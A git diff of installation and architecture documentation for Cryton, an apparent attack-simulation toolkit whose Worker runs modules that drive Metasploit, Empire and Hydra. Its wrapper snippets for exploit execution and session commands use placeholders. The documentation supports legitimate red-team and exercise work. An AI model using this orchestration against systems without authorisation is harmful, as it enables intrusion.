| -| CRYTON_CORE_EXECUTION_THREADS_PER_PROCESS | int | 7 | How some payloads or Rabbit's channel consumers should be distributed. **(do not change/set/export, if you don't know what you're doing)** <br> This affects the speed of starting/consuming Steps/Rabbit requests. | -| CRYTON_CORE_APP_DIRECTORY | string | ~/.local/cryton-core/ | Path to the Cryton Core directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-core/ -``` -The directory will be also used to store logs and other data created by Cryton Core. -**This doesn't apply to the Docker installation.** It will be available in the same directory as the Dockerfile -(`/path/to/cryton-core/cryton-core`). - -To make the installation easier, we need to set our target version first. Versions can be found [here](https://gitlab.ics.muni.cz/cryton/cryton-core/-/tags). -Export the $C_VERSION variable to match the desired version: -```shell -export C_VERSION=version -``` - -Next, we download example settings: -```shell -curl -o ~/.local/cryton-core/.env https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/.env -``` -Update these settings to your needs. - -### Overriding the settings -**NOTICE: This doesn't apply to the Docker Compose installation.** - -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_CORE_DEBUG=false -``` - -## Prerequisites -Install these prerequisites before running Cryton Core. Feel free to use our [Compose configuration](#using-compose-configuration). 
- -- [PostgreSQL database](https://www.postgresql.org/download/) (optionally, use a [Docker image](https://hub.docker.com/_/postgres)) -- [RabbitMQ server](https://www.rabbitmq.com/download.html) (optionally, use a [Docker image](https://hub.docker.com/_/rabbitmq)) -- [PgBouncer](https://www.pgbouncer.org/install.html) (optionally, use a [Docker image](https://hub.docker.com/r/edoburu/pgbouncer)) - -### Using Compose configuration -The easiest way to satisfy the prerequisites is to use our predefined Compose configuration. To do so, you need to -install [Docker Compose](https://docs.docker.com/compose/install/). - -Now, continue to the installation, where you'll find a guide on how to install the prerequisites using Compose: - -- [using pipx](#installation--using-pippipx-) -- [using Docker Compose](#installation--using-docker-compose-) -- [development](#development) - -## Installation (using pip/pipx) -Cryton Core is available in the [PyPI](https://pypi.org/project/cryton-core/) and can be installed using *pip* (`pip install --user cryton-core`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). 
- -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Install prerequisites for pipx installation using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -cd ~/.local/cryton-core/ -curl -o ~/.local/cryton-core/docker-compose.prerequisites.yml https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/docker-compose.prerequisites.yml -curl -o ~/.local/cryton-core/docker-compose.prerequisites.override.yml https://gitlab.ics.muni.cz/cryton/cryton-core/-/raw/$C_VERSION/docker-compose.prerequisites.override.yml -docker compose -f docker-compose.prerequisites.yml -f docker-compose.prerequisites.override.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=localhost -CRYTON_CORE_DB_HOST=localhost -CRYTON_CORE_DB_PORT=16432 -``` - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-core -``` - -Make sure you've correctly set the [settings](#settings). - -If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. - -Everything should be set. Check out the [usage section](#usage). - -## Installation (using Docker Compose) -Cryton Core can be installed using Docker Compose. - -First, we have to clone the repo and switch to the correct version. 
-```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -git checkout $C_VERSION -``` - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Install prerequisites for Compose deployment using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -docker compose -f docker-compose.prerequisites.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=cryton_rabbit -CRYTON_CORE_DB_HOST=cryton_pgbouncer -``` - -### Installing and running with Docker Compose -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -Finally, copy your settings: -```shell -cp ~/.local/cryton-core/.env .env -``` - -We are now ready to build and start the Core: -```shell -docker compose up -d --build -``` - -After a while you should see a similar output: -``` -[+] Running 6/6 - ⠿ Container cryton_rabbit Started - ⠿ Container cryton_apache Started - ⠿ Container cryton_db Healthy - ⠿ Container cryton_pgbouncer Started - ⠿ Container cryton_app Started - ⠿ Container cryton_listener Started -``` - -Everything should be set. 
Check if the installation was successful and the Core is running by either installing Cryton CLI or testing REST API -with curl: -``` -curl localhost:8000/api/ -``` - -Expected result: -``` -{"runs":"http://localhost:8000/cryton/api/v1/runs/","plans":"http://localhost:8000/cryton/api/v1/plans/", -"plan_executions":"http://localhost:8000/cryton/api/v1/plan_executions/","stages":"http://localhost:8000/cryton/api/v1/stages/", -"stage_executions":"http://localhost:8000/cryton/api/v1/stage_executions/","steps":"http://localhost:8000/cryton/api/v1/steps/", -"step_executions":"http://localhost:8000/cryton/api/v1/step_executions/","workers":"http://localhost:8000/cryton/api/v1/workers/"} -``` - -Docker can sometimes create dangling (`<none>:<none>`) images which can result in high disk space usage. You can remove them using: -```shell -docker image prune -``` - -## Development -To install Cryton Core for development, you must install [Poetry](https://python-poetry.org/docs/). - -Clone the repository and then go to the correct directory: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-core.git -cd cryton-core -``` - -### Install prerequisites for development using Compose config -**Only perform this step if you want to install the prerequisites mentioned [here](#prerequisites) using Docker Compose.** - -First, make sure you have: - -- installed [Docker Compose](https://docs.docker.com/compose/install/) -- correctly set the [settings](#settings), you can't change the settings on a running container - -To install the prerequisites simply use: -```shell -docker compose -f docker-compose.prerequisites.yml -f docker-compose.prerequisites.override.yml up -d --build -``` - -Update the settings accordingly: -``` -CRYTON_CORE_RABBIT_HOST=localhost -CRYTON_CORE_DB_HOST=localhost -CRYTON_CORE_DB_PORT=16432 -``` - -### Installation and setup with Poetry -Now we can install the project: -```shell -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - 
-Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -If you're not using a reverse proxy, set `CRYTON_CORE_API_USE_STATIC_FILES=false`. - -Everything should be set, check out the [usage section](#usage). - -## Usage -**NOTICE: If you're using Docker Compose to install the app, you don't need to migrate the database or start -the services mentioned in this section.** - -Move to the app directory, since some files and directories can be spawned in a relative path -```shell -cd ~/.local/cryton-core/ -``` - -Use the following to invoke the app: -```shell -cryton-core -``` - -You should see a help page: -``` -Type 'cryton-core help <subcommand>' for help on a specific subcommand. - -Available subcommands: -... -``` - -**To learn about each command's options use**: -```shell -cryton-core help <your command> -``` - -Before we do anything, **we need to migrate the database**: -```shell -cryton-core migrate -``` - -To be able to use Cryton Core, we need to start the application and its RabbitMQ listener (start each in a separate shell or use the `nohup` command). - -First, **start the application**: -```shell -cryton-core runserver 0.0.0.0:8000 -``` - -Use the Gunicorn server for the production deployment: -```shell -cryton-core startgunicorn -``` - -**Start the RabbitMQ listener**: -```shell -cryton-core startlistener -``` - -### REST API and control -REST API is the only way to communicate with Cryton Core. It is by default running at -[http://0.0.0.0:8000](http://0.0.0.0:8000). Interactive documentation can be found at -[http://0.0.0.0:8000/doc](http://0.0.0.0:8000/doc). - -To be able to control Cryton Core, you have to send requests to its REST API. This can be done manually, or via -[Cryton CLI](cli.md) or -[Cryton Frontend](frontend.md). 
- -### Execution example -Every Run can be described by a simple formula: -``` -Plan template + inventory = Plan instance -Plan instance + Worker = Plan execution -Plan instance + Workers = Run -``` - -**1. Choose or design plan template** -Choose one of the YAML plan templates (in the `examples` directory) or design your own. - -**2. Create Plan instance** -Plan templates can utilize a number of variables that need to be provided during the instantiation process. Do this by -specifying an inventory file. - -**3. Create Worker** -Define Worker(s) that will be used to execute the Plan instance. - -**4. Create Run** -Create a Run by choosing the Plan instance and providing a list of Workers for execution. - -**5. Schedule or execute Run** -You can either schedule Run for a specific date/time, or execute it directly. Run will then be executed on every -Worker simultaneously. - -**6. Read Run Report** -A report can be generated anytime during the execution (also compliant with YAML format). It contains a list of -Stages/Steps and their results. diff --git a/docs/2022.2/starting-point/frontend.md b/docs/2022.2/starting-point/frontend.md deleted file mode 100644 index 17c03a391fae0aa0aabae69f2983d701fd9bb813..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/frontend.md +++ /dev/null @@ -1,92 +0,0 @@ -## Description -Cryton Frontend is a graphical interface used to interact with [Cryton Core](core.md) (its API). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -and **[Cryton Worker](worker.md)** tools. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-frontend). 
- -## Settings -Before installation, you need to set the environment variables to match **Cryton Core** settings. Environment variables -can be found in `src/environments/`. For production build, modify the _environment.prod.ts_ file, else modify the _environment.ts_ file. - -**crytonRESTApiHost:** REST API host (localhost by default). - -**crytonRESTApiPort:** REST API port (8000 by default). - -**refreshDelay:** Sets artificial delay in milliseconds for refresh API requests, users usually react better if the -requests don't happen instantly, but they can see a tiny bit of loading. Initial API request doesn't use delay, -this is only for refreshing data (300 milliseconds by default). - -## Installation (using Docker Compose) -Cryton Frontend can be installed using Docker Compose. - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Installing and running with Docker Compose -First, we have to clone the repo and switch to the correct version (if you haven't already). -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-frontend.git -cd cryton-frontend -``` - -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -We are now ready to build and start the frontend: -```shell -docker compose up -d --build -``` - -Docker Compose will automatically build the app for production with minimal dependencies and deploy it on a Nginx -server inside the container. The default port is set to **8080**, you can change this setting in the `docker-compose.yml` file. - -## Installation (manual) - -### Requirements -- [npm](https://nodejs.org/en/) - -### Installing manually using npm - -1. Clone this repository and cd into it. -2. 
Run `npm install`, npm will take care of installing all the dependencies. -3. Based on the needs you can: - - Serve the app by running `ng serve` or `ng serve --prod` for production settings. - - Only use `ng serve` for development/testing, in a real production environment use either docker installation or - production build deployed on a production-ready web server (for example Nginx). - - App will now be available on **localhost:4200** - - To change the port use argument `--port [port]` - - Build the app by running `npm run build` or `npm run build-prod` for production. - - You can find the build in the **/dist** folder. - -## Development - -### Requirements -- [npm](https://nodejs.org/en/) - -### Installing and running with npm - -- App uses husky to run pre-commit hooks. These include: - - Code formatting with Prettier. - - Linting with ESLint. - - Running unit tests with Karma. -- To start development: - 1. Install dependencies with `npm install`. - 2. Run `npm start` to run the development server. The app will now listen for changes and refresh itself on every change in the project's filesystem. - -## Usage -**Please keep in mind that the [Cryton Core](core.md) -must be running and its API must be reachable.** - -Use in-app help pages to learn about usage. diff --git a/docs/2022.2/starting-point/modules.md b/docs/2022.2/starting-point/modules.md deleted file mode 100644 index 9cdbe43ad42ce93e46526ec72e87cd9ef322600e..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/modules.md +++ /dev/null @@ -1,21 +0,0 @@ -## Description -Cryton (attack) modules is a collection of Python scripts with the goal of orchestrating known offensive security tools -(Nmap, Metasploit, THC Hydra, etc.). Although this is their intended purpose, they are still Python scripts, and therefore -any custom-made script can be used similarly. - -Attack modules get executed inside Step objects using [Cryton Worker](worker.md). 
-All provided arguments are given to the Attack module. - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -More detailed modules' description can be found [here](../modules/howto-create-attack-modules.md). - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-modules). - -## Usage -**Before you download the modules or once you clone the repository, please make sure to choose the correct version (`git checkout <version>`).** - -As mentioned, modules are primarily targeted for use with Cryton Worker. See how to set them up [here](worker.md#setting-up-modules). - -Since they are python modules, you can install and use them manually. You should use a virtual environment like [Poetry](https://python-poetry.org/docs/). diff --git a/docs/2022.2/starting-point/worker.md b/docs/2022.2/starting-point/worker.md deleted file mode 100644 index 30b1965853a42db4cc6ab78bdd21047f21c7b264..0000000000000000000000000000000000000000 --- a/docs/2022.2/starting-point/worker.md +++ /dev/null @@ -1,393 +0,0 @@ -## Description -Cryton Worker is used for executing attack modules remotely. It utilizes [RabbitMQ](https://www.rabbitmq.com/) -as its asynchronous remote procedures call protocol. It connects to the Rabbit MQ server and consumes messages from -the Core component or any other app that implements its [RabbitMQ API](../interfaces/worker-rabbit-api#rabbit-api). - -To be able to execute attack scenarios, you also need to install **[Cryton Core](core.md)** -(or your custom tool that implements Worker's API). -Modules provided by Cryton can be found [here](https://gitlab.ics.muni.cz/cryton/cryton-modules). - -Cryton toolset is tested and targeted primarily on **Debian** and **Kali Linux**. 
Please keep in mind that -**only the latest version is supported** and issues regarding different OS or distributions may **not** be resolved. - -[Link to the repository](https://gitlab.ics.muni.cz/cryton/cryton-worker). - -## Settings -Cryton Worker uses environment variables for its settings. Please update them to your needs. - -| name | value | example | description | -|------------------------------------|---------|----------------------------------|--------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| CRYTON_WORKER_NAME | string | my_worker1 | Unique name used to identify the Worker. | -| CRYTON_WORKER_MODULES_DIR | string | /path/to/cryton-modules/modules/ | Path to the directory containing the modules. | -| CRYTON_WORKER_DEBUG | boolean | false | Make Worker run with debug output. | -| CRYTON_WORKER_INSTALL_REQUIREMENTS | boolean | true | Install requirements.txt for each module on startup. | -| CRYTON_WORKER_CONSUMER_COUNT | int | 7 | Number of consumers used for Rabbit communication <br> (more equals faster request processing and heavier processor usage). | -| CRYTON_WORKER_PROCESSOR_COUNT | int | 7 | Number of processors used for internal requests <br> (more equals faster internal requests processing, but heavier processor usage). | -| CRYTON_WORKER_MAX_RETRIES | int | 3 | How many times to try to re-connect when the connection is lost. | -| CRYTON_WORKER_MSFRPCD_HOST | str | localhost | Metasploit Framework RPC host. | -| CRYTON_WORKER_MSFRPCD_PORT | int | 55553 | Metasploit Framework RPC port. | -| CRYTON_WORKER_MSFRPCD_SSL | boolean | true | Use SSL to connect to Metasploit Framework RPC. | -| CRYTON_WORKER_MSFRPCD_USERNAME | string | msf | Username for Metasploit Framework RPC login. | -| CRYTON_WORKER_MSFRPCD_PASSWORD | string | toor | Password for Metasploit Framework RPC login. 
| -| CRYTON_WORKER_RABBIT_HOST | string | 127.0.0.1 | RabbitMQ server host. | -| CRYTON_WORKER_RABBIT_PORT | int | 5672 | RabbitMQ server port. | -| CRYTON_WORKER_RABBIT_USERNAME | string | admin | Username for RabbitMQ server login. | -| CRYTON_WORKER_RABBIT_PASSWORD | string | mypass | Password for RabbitMQ server login. | -| CRYTON_WORKER_EMPIRE_HOST | string | 127.0.0.1 | Empire server host. | -| CRYTON_WORKER_EMPIRE_PORT | int | 1337 | Empire server port. | -| CRYTON_WORKER_EMPIRE_USERNAME | string | empireadmin | Username for Empire server login. | -| CRYTON_WORKER_EMPIRE_PASSWORD | string | password123 | Password for Empire server login. | -| CRYTON_WORKER_APP_DIRECTORY | string | ~/.local/cryton-worker/ | Path to the Cryton Worker directory. **(do not change/set/export, if you don't know what you're doing)** <br> If changed, update the commands in this guide accordingly. | - -To save the settings **create an app directory**: -```shell -mkdir ~/.local/cryton-worker/ -``` - -The directory will be also used to store logs and other data created by Cryton Worker. -**This doesn't apply to the Docker installation.** It will be available in the same directory as the Dockerfile -(`/path/to/cryton-worker/cryton-worker`). - -Next, we download example settings (**change the version to match the app version - versions can be found [here](https://gitlab.ics.muni.cz/cryton/cryton-worker/-/tags)**): -```shell -curl -o ~/.local/cryton-worker/.env https://gitlab.ics.muni.cz/cryton/cryton-worker/-/raw/<version>/.env -``` -Update these settings to your needs. - -### Overriding the settings -**NOTICE: This doesn't apply to the Docker Compose installation.** - -To override the persistent settings, you can set/export the variables yourself using the **export** command -(use **unset** to remove the variable). For example: -```shell -export CRYTON_WORKER_NAME=my_worker1 -``` - -Some environment variables can be overridden in CLI. Try using `cryton-worker --help`. 
- -### Setting up modules -To be able to **execute** (validate) **attack modules** you must download them into one directory. Then update -`CRYTON_WORKER_MODULES_DIR` environment variable to point to the correct location. If you're using the provided modules -from the [modules' repository](https://gitlab.ics.muni.cz/cryton/cryton-modules), then the variable -will look similar to this `CRYTON_WORKER_MODULES_DIR=/path/to/cryton-modules/modules/`. - -Modules are hot-swappable, which means the modules don't have to be present at startup. -This is especially useful for development but **not recommended for production**. - -Modules directory example: -``` -tree $CRYTON_WORKER_MODULES_DIR -CRYTON_WORKER_MODULES_DIR/ -├── mod_hydra -│ └── mod.py -└── mod_cmd - └── mod.py -``` - -## Prerequisites -Worker can run without these prerequisites. However, they are **highly recommended** since they allow Worker to use all of its functionality. -- [Metasploit Framework](https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html) allows using Metasploit sessions and MSF listeners. -- [Empire post-exploitation framework](https://bc-security.gitbook.io/empire-wiki/quickstart/installation) allows deployment and interaction with Empire agents. - -Additionally, to start the MSF as a service follow [this guide](https://docs.rapid7.com/metasploit/running-metasploit-remotely/) or simply use: -```shell -msfrpcd -U <CRYTON_WORKER_MSFRPCD_USERNAME> -P <CRYTON_WORKER_MSFRPCD_PASSWORD> -``` - -## Installation (using pip/pipx) -Cryton Worker is available in the [PyPI](https://pypi.org/project/cryton-worker/) and can be installed using *pip* (`pip install --user cryton-worker`). -However, we **highly recommend** installing the app in an isolated environment using [pipx](https://pypa.github.io/pipx/). 
- -### Requirements -Install the following requirements: -- [Python](https://www.python.org/about/gettingstarted/) >=3.8 -- [pipx](https://pypa.github.io/pipx/) - -### Installing with pipx -Once you have *pipx* ready on your system, you can start the installation: -```shell -pipx install cryton-worker -``` - -Make sure you've correctly set the [settings](#settings). - -Optionally, you can set up [shell completion](#shell-completion). - -Everything should be set. Check out the [usage section](#usage). - -## Installation (using Docker Compose) -Cryton Worker can be installed using Docker Compose. - -To allow the Worker to start listeners, the container has raw access to the host’s network interface. - -**This guide won't describe how to install or mount the tools/applications used by the (attack) modules.** -More information can be found in the [Docker documentation](https://docs.docker.com/storage/volumes/). - -### Requirements -- [Docker Compose](https://docs.docker.com/compose/install/) - -Add yourself to the group *docker*, so you can work with Docker CLI without *sudo*: -```shell -sudo groupadd docker -sudo usermod -aG docker $USER -newgrp docker -docker run hello-world -``` - -### Installing and running with Docker Compose -First, we have to clone the repo and switch to the correct version. -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git -cd cryton-worker -git checkout <version> -``` - -Make sure you've correctly set the [settings](#settings). You can't change the settings on a running container. - -Finally, copy your settings: -```shell -cp ~/.local/cryton-worker/.env .env -``` - -We are now ready to build and start the Worker: -```shell -docker compose up -d --build -``` - -After a while you should see a similar output: -``` -[+] Running 1/1 - ⠿ Container cryton_worker Started -``` - -Everything should be set. 
Check if the installation was successful and the Worker is running: -```shell -docker compose logs -``` -You should see `[*] Waiting for messages.` in the output. - -Docker can sometimes create dangling (`<none>:<none>`) images which can result in high disk space usage. You can remove them using: -```shell -docker image prune -``` - -## Development -To install Cryton Worker for development, you must install [Poetry](https://python-poetry.org/docs/). - -Clone the repository: -```shell -git clone https://gitlab.ics.muni.cz/cryton/cryton-worker.git -``` - -Then go to the correct directory and install the project: -```shell -cd cryton-worker -poetry install -``` - -To spawn a shell use: -```shell -poetry shell -``` - -Make sure you've correctly set the [settings](#settings). -To override the settings quickly, you can use this handy one-liner: -```shell -export $(grep -v '^#' .env | xargs) -``` - -Optionally, you can set up [shell completion](#shell-completion) - -Everything should be set, check out the [usage section](#usage). - -## Usage -**NOTICE: If you're using Docker Compose to install the app, you can skip this section.** - -Use the following to invoke the app: -```shell -cryton-worker -``` - -You should see a help page: -``` -Usage: cryton-worker [OPTIONS] COMMAND [ARGS]... - - Cryton Worker CLI. - -Options: - ... -``` - -**To learn about each command's options use**: -```shell -cryton-worker <your command> --help -``` - -To start Worker use `cryton-worker start` and you should see something like: -``` -Starting Worker <Worker name>.. -To exit press CTRL+C -Connection does not exist. Retrying.. -Connection to RabbitMQ server established. -[*] Waiting for messages. -``` - -## Executing modules -To be able to execute a module (Python script), it must have the following structure and IO arguments. - -### Modules' structure -- Each module must have its own directory with its name. -- Script (module) must be called `mod.py`. 
-- Module must contain an `execute` function that takes a dictionary and returns a dictionary. It's an entry point for executing it. -- Module should contain a `validate` function that takes a dictionary, validates it, and returns 0 if it's okay, else raises an exception. - -Path example: -`/CRYTON_WORKER_MODULES_DIR/my-module-name/mod.py` - -Where: -- **CRYTON_WORKER_MODULES_DIR** has to be the same path as is defined in the *CRYTON_WORKER_MODULES_DIR* variable. -- **my-module-name** is the directory containing your module. -- **mod.py** is the module file. - -Module (`mod.py`) example: -```python -def validate(arguments: dict) -> int: - if arguments != {}: - return 0 # If arguments are valid. - raise Exception("No arguments") # If arguments aren't valid. - -def execute(arguments: dict) -> dict: - # Do stuff. - return {"return_code": 0, "serialized_output": ["x", "y"]} - -``` - -### Input parameters -Every module has its own input parameters. These input parameters are given as a dictionary to the -module `execute` (when executing the module) or `validate` (when validating the module parameters) function. - -### Output parameters -Every attack module (its `execute` function) returns a dictionary with the following keys: - -| Parameter name | Parameter meaning | -|---------------------|---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| `return_code` | Numeric representation of result (0, -1, -2). <br />0 (OK) means the module finished successfully.<br />-1 (FAIL) means the module finished unsuccessfully.<br />-2 (ERROR) means the module finished with an unhandled error. | -| `serialized_output` | Parsed output of the module. Eg. for a bruteforce module, this might be a list of found usernames and passwords. 
| | -| `output` | Raw output of the module | - -## Prebuilt functionality for modules -Worker provides prebuilt functionality to make building modules easier. Import it using: -```python -from cryton_worker.lib.util import module_util -``` - -It gives you access to: -### Metasploit -Wrapper for *MsfRpcClient* from *[pymetasploit3](https://github.com/DanMcInerney/pymetasploit3)*. -Examples: -```python -# Check if the connection to msfrpcd is OK before doing anything. -from cryton_worker.lib.util.module_util import Metasploit -msf = Metasploit() -if msf.is_connected(): - msf.do_stuff() -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -search_criteria = {"via_exploit": "my/exploit"} -found_sessions = Metasploit().get_sessions(**search_criteria) -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -output = Metasploit().execute_in_session("my_command", "session_id") -``` - -```python -from cryton_worker.lib.util.module_util import Metasploit - -options = {"exploit_arguments": {}, "payload_arguments": {}} -Metasploit().execute_exploit("my_exploit", "my_payload", **options) -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -token = Metasploit().client.add_perm_token() -``` -```python -from cryton_worker.lib.util.module_util import Metasploit -output = Metasploit().get_parameter_from_session("session_id", "my_param") -``` - -### get_file_binary -Function to get a file as binary. -Example: -```python -from cryton_worker.lib.util.module_util import get_file_binary -my_file_content = get_file_binary("/path/to/my/file") -``` - -### File -Class used with *[schema](https://pypi.org/project/schema/)* for validation if file exists. -Example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import File -schema = Schema(File(str)) -schema.validate("/path/to/file") -``` - -### Dir -Class used with *[schema](https://pypi.org/project/schema/)* for validation if directory exists. 
-Example: -```python -from schema import Schema -from cryton_worker.lib.util.module_util import Dir -schema = Schema(Dir(str)) -schema.validate("/path/to/directory") -``` - -## Shell completion -Shell completion is available for the *Bash*, *Zsh*, and *Fish* shell and has to be manually enabled (**the tool must be installed first**). - -### Bash -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-worker/ -``` - -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=bash_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.bash -``` - -Source the file in the `~/.bashrc` file: -```shell -echo ". ~/.local/cryton-worker/cryton-worker-complete.bash" >> ~/.bashrc -``` - -You may need to restart your shell for the changes to take effect. - -### Zsh -First, **create an app directory** (if you haven't already): -```shell -mkdir ~/.local/cryton-worker/ -``` - -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=zsh_source cryton-worker > ~/.local/cryton-worker/cryton-worker-complete.zsh -``` - -Source the file in the `~/.zshrc` file: -```shell -echo ". ~/.local/cryton-worker/cryton-worker-complete.zsh" >> ~/.zshrc -``` - -You may need to restart your shell for the changes to take effect. - -### Fish -Generate and save the completion script: -```shell -_CRYTON_WORKER_COMPLETE=fish_source cryton-worker > ~/.config/fish/completions/cryton-worker-complete.fish -``` - -You may need to restart your shell for the changes to take effect. diff --git a/docs/acknowledgements.md b/docs/acknowledgements.md index d4497c44edfe25eec4ecbb17ae1683048bba172f..a7d45c99d81093c2dbf683d0b986b6a194cf064c 100644 --- a/docs/acknowledgements.md +++ b/docs/acknowledgements.md @@ -2,5 +2,5 @@ Several research activities helped us to create this open-source project. 
The of | | | | |-|-|-| -|  | This research was supported by the Security Research Programme of the Czech Republic 2015-2022 (BV III/1 - VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20202022133 - Breach Emulation and Attack Simulation Toolkit (BEAST)](https://www.muni.cz/en/research/projects/49127) | -|  | This research was supported by the Security Research Programme of the Czech Republic 2015–2020 (BV III/1 – VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20162019014 – Simulation, detection, and mitigation of cyber threats endangering critical infrastructure](https://www.muni.cz/en/research/projects/31984). | +|  | This research was supported by the Security Research Programme of the Czech Republic 2015-2022 (BV III/1 - VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20202022133 - Breach Emulation and Attack Simulation Toolkit (BEAST)](https://www.muni.cz/en/research/projects/49127){target="_blank"} | +|  | This research was supported by the Security Research Programme of the Czech Republic 2015–2020 (BV III/1 – VS) granted by the Ministry of the Interior of the Czech Republic under No. [VI20162019014 – Simulation, detection, and mitigation of cyber threats endangering critical infrastructure](https://www.muni.cz/en/research/projects/31984){target="_blank"}. | diff --git a/docs/architecture.md b/docs/architecture.md new file mode 100644 index 0000000000000000000000000000000000000000..f1931d8e6156fe4a45ff7266b6d35e6b91064ca2 --- /dev/null +++ b/docs/architecture.md @@ -0,0 +1,78 @@ + + +## Core +The main functionality is implemented in [Cryton Core](components/core.md). As the name suggests, this is the core component of the Cryton toolset. +It gives you the ability to create and control attack plans, generate reports, and control Workers. + +!!! note "" + + To issue commands use the provided [REST API](interfaces/core-rest-api.md). 
+ +## CLI and Frontend +There are two ways to interact with Cryton or, more precisely, utilize its REST API. + +One of them is [Cryton CLI](components/cli.md), which allows a simple way to run (automate) actions from the terminal. + +A slightly more user-friendly is [Cryton Frontend](components/frontend.md), a graphical web interface providing additional +functionality to improve the user experience. + +!!! note "" + + There is also the option to develop a custom application that will send requests to Core's [REST API](interfaces/core-rest-api.md). + +## Worker +[Cryton Worker](components/worker.md) is a component for executing attack modules remotely. It utilizes RabbitMQ as its asynchronous remote +procedures call protocol. It connects to the RabbitMQ server and consumes messages from the Core component or any other +app that implements its [Rabbit API](interfaces/worker-rabbit-api.md). + +## Modules +[Cryton modules](components/modules.md) is a collection of scripts that allow the orchestration of some known offensive security tools such as Metasploit. +For example, we can have the Nmap module that implements the scanning capabilities of the Nmap tool, serializes the evidence, and evaluates its results. + +!!! note "" + + You can [develop](development/modules.md) modules according to your needs. + +--- + +## Do I need to have all components installed? +Depending on your use case, the composition of Cryton may vary. For example, installing the Frontend is unnecessary if +you wish to control Cryton using only the CLI. +However, for most use cases, you will install the main components (CLI, Core, Worker, and modules). + +--- + +## Technological decisions +The next section tries to explain the choices for currently employed technologies. Please take into account that these +technologies are not supposed to be final and unchangeable. They just appeared to be best suited for the task at the +time of development, they may change in the future. 
+ 
+### APScheduler
+This was the first choice made for the scheduler module. It allows you to schedule a Python method at a specific time or day or even interval.
+It is pretty lightweight and does not need much in terms of resources or capacity. So far we have not found anything better suited for the task.
+
+### Django ORM
+In the beginning, Cryton used the SQLite database with direct access. That changed as SQLite is not good with scaling
+for the future. The second choice was PostgreSQL, which stayed to this day, but it was updated with the use of the Django ORM.
+Using the Django REST framework for the REST interface also emerged from this choice.
+
+### RabbitMQ
+For developing the Master-Worker architecture, where you can issue commands remotely, we needed some kind of RPC. However,
+as experience showed us, we also needed it to be asynchronous. That's why we chose the RabbitMQ message broker.
+
+### Metasploit
+Probably everyone in the IT security field has heard about the Metasploit framework. It is one of the most complete and usable
+open-source attack tools available. Of course, Cryton uses it for some attack modules - the majority of simulated attacks
+in CDXs usually do use Metasploit in some way. But its attacking capabilities are not the only reason to use it. Its
+real advantage is Metasploit's session management. Every time you open a session to some machine it stores it under
+a specific ID which you can later use to communicate with the target. This is one of the main features you can use while
+executing your attack scenario in Cryton.
+
+### Empire
+For post-exploitation attacks, we decided to add support for an open-source project called Empire. Empire is
+a post-exploitation framework that includes pure-PowerShell Windows agents, Python 3 Linux/OS X agents, and C# agents.
+The framework offers cryptologically-secure communications and flexible architecture. 
